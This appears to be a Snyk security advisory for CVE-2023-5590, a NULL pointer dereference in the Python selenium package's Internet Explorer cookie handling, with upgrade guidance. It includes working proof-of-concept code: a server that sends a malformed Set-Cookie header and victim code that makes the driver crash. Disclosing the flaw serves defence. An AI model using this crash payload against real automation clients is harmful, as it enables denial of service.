NULL Pointer Dereference Affecting selenium package, versions [,4.15.1)


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
0.07% (32nd percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about NULL Pointer Dereference vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-PYTHON-SELENIUM-6062316
  • published16 Nov 2023
  • disclosed15 Oct 2023
  • creditcoolkingcole

Introduced: 15 Oct 2023

CVE-2023-5590  (opens in a new tab)
CWE-476  (opens in a new tab)

How to fix?

Upgrade selenium to version 4.15.1 or higher.

Overview

selenium is a Python language bindings for Selenium WebDriver

Affected versions of this package are vulnerable to NULL Pointer Dereference due to an insufficient check on CookieWndProc function. An attacker can cause the application to crash by sending specially crafted data that triggers this condition.

PoC

Attacker Server Code

from http.server import BaseHTTPRequestHandler, HTTPServer
from datetime import datetime, timedelta

class CustomHTTPRequestHandler(BaseHTTPRequestHandler):

def do_GET(self):
    # Send response status code
    self.send_response(200)

    # Send headers
    self.send_header('Content-type', 'text/html')
    # Set the cookie expiration to one day in the future
    expiration_date = (datetime.utcnow() + timedelta(days=1)).strftime('%a, %d %b %Y %H:%M:%S GMT')
    
    well_formed_cookie = f"cookie_name=cookie_value; Domain=127.0.0.1; Path=/; HttpOnly; Expires={expiration_date};"
    self.send_header('Set-Cookie', well_formed_cookie)

    malicious_cookie = f"cookie_name2" #crash
    self.send_header('Set-Cookie', malicious_cookie)

    self.end_headers()

    # Send message back to client
    message = "Hello world!"
    self.wfile.write(bytes(message, "utf8"))
    return

def run(): print('Starting server...') server_address = ('127.0.0.1', 8090) httpd = HTTPServer(server_address, CustomHTTPRequestHandler) print('Server is running...') httpd.serve_forever()

run()

Example Victim Code

from selenium import webdriver
import logging
import time

handler = logging.FileHandler("sel.log") logger = logging.getLogger('selenium') logging.basicConfig(level=logging.DEBUG) logger.setLevel(logging.DEBUG) logger.addHandler(handler)

options = webdriver.IeOptions() options.ignore_zoom_level = True options.ignore_protected_mode_settings = True options.attach_to_edge_chrome = True options.initial_browser_url = 'https://selenium.dev' service = webdriver.IeService(log_file="ie.log", log_level='DEBUG') driver = webdriver.Ie(options=options,service=service)

driver.set_page_load_timeout(20) print("Getting the page: ")

try: driver.get("http://127.0.0.1:8090/") except Exception as e: print(e)

print("Got the page!") print("Get Cookies: ") cookies = driver.get_cookies() print(cookies) time.sleep(3) driver.quit()

References

CVSS Scores

version 3.1